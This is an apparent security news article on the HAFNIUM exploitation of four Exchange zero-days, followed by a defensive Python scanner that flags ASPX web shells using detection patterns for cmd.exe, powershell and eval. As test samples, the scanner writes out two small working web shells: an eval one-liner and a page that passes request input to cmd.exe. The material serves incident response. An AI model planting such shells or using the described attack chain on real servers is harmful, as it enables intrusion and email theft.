Microsoft Exchange Servers Exploitation
Microsoft Exchange servers, based on the Windows platform, let a business's employees communicate among themselves and with people outside the company through various means. These servers are reported to have four zero-day vulnerabilities, which are now being exploited by a Chinese state-backed hacker group called HAFNIUM to steal companies' email data. Remote attackers targeting Exchange servers exploit the following vulnerabilities to gain remote access:
CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service that lets an attacker run code as SYSTEM on the Exchange server. CVE-2021-26858 and CVE-2021-27065 are arbitrary file write vulnerabilities in Exchange that let attackers authenticate with the Exchange server.
All four of these vulnerabilities can be chained together to gain remote access to a company's Exchange servers and use them to install a web shell for uploading additional files, stealing email data and creating backdoors. Microsoft has detected that the HAFNIUM group is using virtual private servers based in the US for its attacks. Besides stealing data, the attackers can create a remote shell back to their C2 for internal access, and can also dump the memory of LSASS.exe to obtain any cached credentials. Microsoft has released security patches for all four of these vulnerabilities and recommends that users install them immediately to avoid attacks. Users can scan for vulnerable Microsoft Exchange servers with an Nmap script written by Microsoft Senior Threat Intelligence Analyst Kevin Beaumont. Updating servers with the latest patch requires them to be on a supported Update Rollup or Cumulative Update. Read more about securing your Exchange servers here.
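The article notes that the attackers' first post-exploitation step is to drop a web shell on the server. The following defender-side example, added here and not part of the original article or of any Microsoft tooling, shows one way an incident responder could triage an Exchange web root for dropped ASPX shells: each file is scored against a small set of traits typical of web shells (request-controlled input, runtime code evaluation, process spawning, command interpreters, runtime code loading) and files over a threshold are reported. The patterns, weights, threshold, directory layout and the three sample files are all constructed assumptions for this illustration, not a vendor signature set; the benign sample reads a query parameter and echoes it, while the two constructed shells evaluate or execute request-controlled input.

```python
"""Heuristic scan of an Exchange/IIS web root for dropped ASPX web shells.

Added defensive example; the patterns and sample files are constructed here and
are not a vendor signature set. Tune weights and threshold before relying on them.
"""
import re
import tempfile
from pathlib import Path

# (regex, weight, reason): traits common to ASPX web shells. Weights are
# assumptions chosen so that a single benign trait never crosses THRESHOLD.
SUSPICIOUS = [
    (re.compile(r"\bRequest\s*(\.\s*(Item|Form|QueryString|Params|Headers))?\s*\[", re.I),
     1, "reads a request-controlled value"),
    (re.compile(r"\b(eval|JScript\.Eval|Execute)\s*\(", re.I),
     3, "evaluates code at runtime"),
    (re.compile(r"System\.Diagnostics\.Process|ProcessStartInfo|Process\.Start", re.I),
     3, "spawns a process"),
    (re.compile(r"\bcmd\.exe\b|\bpowershell(\.exe)?\b", re.I),
     2, "references a command interpreter"),
    (re.compile(r"FromBase64String|Assembly\.Load", re.I),
     2, "decodes or loads code at runtime"),
    (re.compile(r"runat\s*=\s*[\"']server[\"']", re.I),
     1, "inline server-side script block"),
]
THRESHOLD = 4  # assumed cut-off: two weak traits alone stay below it
EXTENSIONS = {".aspx", ".ashx", ".asmx"}


def score_file(path: Path) -> tuple[int, list[str]]:
    """Return (score, reasons) for one file; each pattern counts at most once."""
    text = path.read_text(errors="replace")
    score, reasons = 0, []
    for pattern, weight, reason in SUSPICIOUS:
        if pattern.search(text):
            score += weight
            reasons.append(reason)
    return score, reasons


def scan_tree(root: Path, threshold: int = THRESHOLD) -> list[dict]:
    """Walk root and return the server-side script files whose score reaches threshold."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            score, reasons = score_file(path)
            if score >= threshold:
                findings.append({"path": path, "score": score, "reasons": reasons})
    return findings


def build_sample_tree() -> Path:
    """Write three constructed ASPX files into a temp dir and return its root."""
    root = Path(tempfile.mkdtemp(prefix="exchange-webroot-"))
    owa = root / "owa" / "auth"  # constructed layout, stands in for a real web root
    owa.mkdir(parents=True)
    # Benign page: reads a query parameter but only HTML-encodes and echoes it.
    (owa / "benign.aspx").write_text(
        '<%@ Page Language="C#" %>\n<script runat="server">\n'
        'void Page_Load(object s, EventArgs e) {\n'
        '  lbl.Text = Server.HtmlEncode(Request.QueryString["id"]);\n}\n</script>\n'
    )
    # Constructed one-liner in the style of a minimal eval-based web shell.
    (owa / "oneliner.aspx").write_text(
        '<%@ Page Language="Jscript" %><%eval(Request.Item["x"], "unsafe");%>\n'
    )
    # Constructed command-execution shell: request value handed to cmd.exe.
    (owa / "cmdshell.aspx").write_text(
        '<%@ Page Language="C#" %>\n<script runat="server">\n'
        'void Page_Load(object s, EventArgs e) {\n'
        '  var p = new System.Diagnostics.Process();\n'
        '  p.StartInfo.FileName = "cmd.exe";\n'
        '  p.StartInfo.Arguments = "/c " + Request["c"];\n'
        '  p.Start();\n}\n</script>\n'
    )
    return root


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f['path']}  score={f['score']}  {', '.join(f['reasons'])}")
```

On the constructed tree the benign page scores 2 (request read plus server script block) and stays unreported, the one-liner scores 4 and the command shell 7. A scoring approach like this is deliberately noisy in the direction of false positives; in practice it is paired with a comparison of file modification times against the patch window and with the server's own HTTP logs, and every hit is reviewed by hand rather than acted on automatically.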